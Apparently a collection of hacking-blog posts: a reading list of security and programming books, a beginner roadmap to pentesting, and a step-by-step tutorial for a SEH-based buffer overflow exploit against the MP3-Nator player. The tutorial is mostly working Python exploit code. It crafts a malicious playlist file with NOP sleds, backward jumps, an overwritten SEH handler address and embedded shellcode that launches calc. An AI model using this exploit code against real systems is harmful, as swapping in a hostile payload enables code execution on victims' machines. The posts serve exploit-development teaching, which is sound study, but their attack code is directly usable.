Useful books to get into hacking!

The site moved to the root domain, where all posts are imported. Please go to http://pusheax.com/

A good book can take you far. Reading good books is a great way to learn something new and improve your knowledge. I have posted the Amazon links for some useful books (no matter how you get them). These books will help you a lot to get into hacking. After reading them you will have a very good understanding of systems and hacking, and you will be able to find the information you are looking for. There are thousands of free papers, but you don't know what to search for and what to learn. After reading these books you will have a goal.

1. C Primer Plus, 5th Edition: To get into hacking and penetration testing we need to understand a programming language. One of the most powerful languages is C. This book is very good for learning the C programming language, whereas "The C Programming Language" is a bit harder for newbies. Get this book and start reading.

2. Core Python Application Programming: For automating quick tasks we need to code in a scripting language (for example for exploit development). For this, Python is really powerful (my favorite language). Learn Python from this book. For the basics of Python get the book "Learn Python the Hard Way" or go to the tutorial section of www.python.org.

3. Assembly Language Step-by-Step: Assembly language is very important for understanding how a system works and for exploit development. This book teaches basic assembly language using NASM, which is enough to understand registers, instructions and basic coding (such as shellcoding). After reading this book you should read the Intel manuals.

4. Advanced Linux Programming: Don't avoid Linux internals. We are required to know Linux internals, and system programming is the best way to go. This book is good and freely downloadable.

5. Get two books on Windows: Windows® Internals, Part 1: Covering Windows Server® 2008 R2 and Windows 7, and Windows Internals, Part 2: Covering Windows Server® 2008 R2 and Windows 7, and read them when you have free time. It is very useful to know Windows internals.

6. Basics of Penetration Testing, 2nd edition: I have read the first edition and it was good for newbies coming into hacking. Get the basic idea of penetration testing and hacking from this book.

7. The Web Application Hacker's Handbook, 2nd edition: This is a gold book for learning web hacking. If you are a newbie and read this book carefully, you will have a very good understanding of web hacking. I believe you don't need any other book to learn web hacking. After reading it you just need to start your real research on web hacking. Another book is the OWASP "Web Application Penetration Testing Guide", which is a good start too.

8. The Shellcoder's Handbook, second edition: This book is very good for learning system hacking. It is a bit outdated but still very useful. It discusses common software vulnerabilities like buffer overflows, format strings, shellcoding etc. Get this book!!!

9. Hack using Python: I did not read this book fully, but it is very good if you want to know how to hack using the Python programming language. Yes, you should read this book (get it somehow!).

10. Corelan: Corelan has more than 11 tutorials, which are worth more than other commercial exploit development courses and books. Read them if you want to move into exploit development and shellcoding.

11. Metasploit cookbook

Getting started in pentesting!!!


Do you also want to get started with pentesting and hacking? There are thousands of people who want to get started with pentesting and hacking but don't have any clue where to start. So I quickly wrote this article so that you can get started easily, without any confusion.

NOTE: Hacking is a long road, since it is research. You need to change your mindset completely and be 100% serious that you will start studying to be a hacker or a pentester. If you want to hack for temporary fun, or to impress your friends, then being a script kiddie is okay (keylogger and RAT). It is not possible to learn hacking in a few months; it may take 3-10 years to become a good one. So you take one option: 1. Become a script kiddie, 2. Become a professional pentester or hacker, security researcher. Up to you!!!

Basic

1. Basics of networking: Understanding networking is really important, since everything we do is over the network. So you should have a good understanding of TCP/IP and the OSI model.

2. Programming: Programming is very important for being a hacker or pentester, because we must know how a program and a system really work. Also, without programming skills it is hard to find a vulnerability. The most important languages you should learn are:

    Python
    C/C++
    Assembly
    PHP

Intermediate
1. Become a system administrator: Yes, you need to be a system administrator of both Linux and Windows. If you can't be a good system administrator, it is not possible to be a good pentester.
2. Writing code: Write basic code. You don't need to be a software developer, but programming is the best weapon for solving your problems. For example, you want to complete a task automatically (such as deleting a file), check the permissions of hundreds of files, etc. So write code!!! Maybe 10-50 lines of code can do very powerful work for you.
3. Read some online articles and resources:
4. Try to go deeper into the operating system: Yes, understand the internals of the OS (Windows, Linux). If you want to be a hacker you need to know the operating system very well.

Intermediate+
1. Virtualization: Get VMware Workstation or VirtualBox. Install various operating systems such as Windows XP, 7, Red Hat, Debian etc. Install some additional software and run your port scanner, vulnerability scanner etc.

2. Old applications and known vulnerabilities: Go to exploit-db.com and get some vulnerable applications. Install them in your VM and re-create the exploit. Use your debugger and your knowledge. You should install various software, including web and system software. You may also get the OWASP "Broken Web Applications" project.

3. Pentesting distro: Install Kali (Backtrack) Linux and use the tools against your VM.

4. Hack: Hack yourself and hack the VM before going to the real world.

Advanced
You will understand when you need advanced knowledge and what "advanced" means.

There are lots of things you need to become a successful hacker. Everything can take 1, 2 or 3 or even more years. You need to be patient and serious about hacking. It is not possible to hack, or to learn to hack, within a few days. Just keep going until success, and success will be waiting for you :). Various books on pentesting are really very helpful. I will write another post with reviews of some books to learn hacking more quickly.

Exploit writing>>> SEH based!


Today I re-exploited a piece of software called MP3-Nator. SEH based exploitation is a bit challenging. I am going to show you quickly how I exploited this SEH based vulnerability using only the following tools:

1. Immunity Debugger.
2. mona.py (Corelan).
3. Metasploit (for shellcode).
4. The vulnerable application.

Access Violation!
First we are going to make the application crash (the classic way!). Before that, attach the application to Immunity Debugger. I hope you already know how to attach an application in Immunity Debugger (File >> Attach >> find Mp3-Nator >> click Attach):

The simple Python script:

print("Creating exploit.")
f = open("nator.plf", "wb")  # Create the playlist file the application will load

push = b"A" * 6000  # 6000 bytes of junk, enough to crash the parser

try:
    f.write(push)
    f.close()
    print("File created")
except IOError:
    print("File cannot be created")

After generating "nator.plf" we need to open the file in the application:

1. Click on the PlayList menu.
2. Load PlayList.
3. Open nator.plf.

But unfortunately it is not going to overwrite EIP at all, because of SEH.

EDX, EBP, ESI and EDI hold our own buffer (we can replace it with shellcode!). But SEH also got overwritten by our buffer:

Overwriting SEH means we control SEH and Next SEH, which means we can make the SEH handler divert execution to our shellcode!

What ? What is SEH? The SEH
Buffer space
I used mona.py to create the pattern (Metasploit can do this too). If you don't know how to install mona or how to use it, go to redmine.corelan.be/projects/mona and read the manual.

The simple mona command is: pattern_create 6000. Replace the "A"s with the pattern saved in the indicated location (for me it is C:\mona\MP3N). Re-generate nator.plf, open it with Mp3-Nator inside Immunity, and we see:

We see SEH and Next SEH got overwritten with mona's pattern. Now we need to find out how much junk buffer we need to reach SEH (the same as for EIP). Let's find it:

Now we are sure that we need 4112 bytes to overwrite SEH. To be 100% sure we are going to test it again:

print("Creating exploit.")
f = open("nator.plf", "wb")  # Create the playlist file

push = b"A" * 4108   # 4112 - 4: junk up to Next SEH
push += b"B" * 4     # Next SEH
push += b"C" * 4     # SEH
push += b"D" * 2000  # Shellcode placeholder
try:
    f.write(push)
    f.close()
    print("File created")
except IOError:
    print("File cannot be created")

If Next SEH is "BBBB" and SEH is "CCCC" then we are ready to go 🙂.

DO SOMETHING WITH SEH and NSEH

This time we want to overwrite SEH and Next SEH with valid addresses so that execution goes to our shellcode. The common approach is to find a "pop pop ret" address for SEH and put a few-byte jump in Next SEH.

Run the mona command !mona seh at crash time, open the output file and find a null-free address. But unfortunately our life is not that easy, so there is no null-free address. The exploit is going to be a bit challenging.

Anyway, I have chosen the address 0x00448f7a in MP3N.exe. Since we have a null byte in our return address, we simply can't place our shellcode the normal way, as we did before.

Do the Calculation

[figure: calculation for storing shellcode]

[figure: long jump]

[figure: NSEH]

Our calculation is done!!!
BUILDING THE EXPLOIT

Now our exploit:

junk+shellcode+nops+jump+nseh+seh+more

In a normal SEH based overflow we first find an address for "pop pop ret" and put a short jump in NSEH, such as "\xeb\x08\x90\x90", but that is a forward jump, whereas we need a backward jump, as we already calculated using metasm (jmp $-20). Anyway, since our only SEH address (0x00448f7a) contains a null byte, we can't simply short jump to our nops or shellcode. For this reason we need a long jump to land where our nops start.

The simple way to explain this:

Junk of 2608 bytes. Use nops instead of "A" to be safe. Then put the 343-byte shellcode. So the stack holds 2608+343 bytes, then 1152 more nops (\x90) and the long jump "\xe9\x2b\xf8\xff\xff". The long jump is an instruction and it is 5 bytes. Now we have exactly the number of bytes needed before overwriting SEH and NSEH with our addresses:

2608+343+1152+5=4108.

After the 4108 bytes we need NSEH to make a short jump to our long jump. If we make a 20-byte backward jump, we land in our nops within the 1152. Remember, nops do nothing but pass execution along. So the stack simply executes the long jump "\xe9\x2b\xf8\xff\xff". After executing the long jump we go back into our nops within the 2608. After the nops we have the shellcode to execute. Since we made a 2000-byte backward jump, it needs 1113 nops to pass to reach our shellcode.

Anyway, let's get back to the debugger and do some tests:

print("Creating exploit.")
f = open("nator.plf", "wb")  # Create the playlist file

junk = b"\x90" * 2608              # 2608 bytes of nops instead of "A"
# 343 bytes shellcode (placeholder for now)
shellcode = b"D" * 343
nops = b"\x90" * 1152
jump = b"\xe9\x2b\xf8\xff\xff"     # Jump back -2000 bytes
nseh = b"\xeb\xea\x90\x90"         # short jump backwards into the nops
seh = b"\x7a\x8f\x44\x00"          # 0x00448f7a
more = b"\x90" * 1000

try:
    f.write(junk + shellcode + nops + jump + nseh + seh + more)
    f.close()
    print("File created")
except IOError:
    print("File cannot be created")

Open the application in the debugger, run it and search for the SEH address 0x00448f7a. Set a breakpoint there by pressing F2.

Now open nator.plf in the application. Just press SHIFT+F9 at the first crash. We hit our breakpoint. If we scroll down a bit we see a bunch of "D"s within our 4108 bytes.

After pressing SHIFT+F9 we hit the breakpoint. Now press F8 until we reach the nops:

We just did a 20-byte backward jump into the nops. Let's keep going with F8. 0012FD53  ^E9 2BF8FFFF      JMP 0012F583 is actually the long jump, and it goes back 2000 bytes to where our nops start. So if we keep pressing F8 we will soon reach the "44"s, which means "D"; later we will replace the "D"s with our real shellcode.

So it is time to put in our real shellcode. Here is the final script:

print("Creating exploit.")
f = open("nator.plf", "wb")  # Create the playlist file
junk = b"\x90" * 2608        # 2608 bytes of nops
# 343 bytes shellcode (copied from a working exploit, see the note below)
shellcode = (b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
             b"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
             b"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
             b"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
             b"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
             b"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
             b"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
             b"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
             b"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
             b"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
             b"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
             b"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
             b"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
             b"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
             b"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
             b"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
             b"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
             b"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
             b"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
             b"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
             b"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
             b"\x4e\x46\x43\x36\x42\x50\x5a")
nops = b"\x90" * 1152
jump = b"\xe9\x2b\xf8\xff\xff"     # Jump back -2000 bytes
nseh = b"\xeb\xea\x90\x90"         # short jump backwards into the nops
seh = b"\x7a\x8f\x44\x00"          # 0x00448f7a
more = b"\x90" * 1000

try:
    f.write(junk + shellcode + nops + jump + nseh + seh + more)
    f.close()
    print("File created")
except IOError:
    print("File cannot be created")

Note: I copied the shellcode from a working exploit. But you can always generate shellcode using Metasploit. Do so!

And pop up the calc:

BOOM!!!

The most important part of this exploit is dealing with a "pop pop ret" address that contains NULL bytes. I hope you now have a clear understanding of how to work in this kind of situation. But if you still have any problem, contact me or comment here and I will try my best to help you!

I have tried to make it simple. If you want to know more about SEH based exploits, Corelan has very good tutorials about SEH:
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/ and
https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

Good luck and happy hunting!!!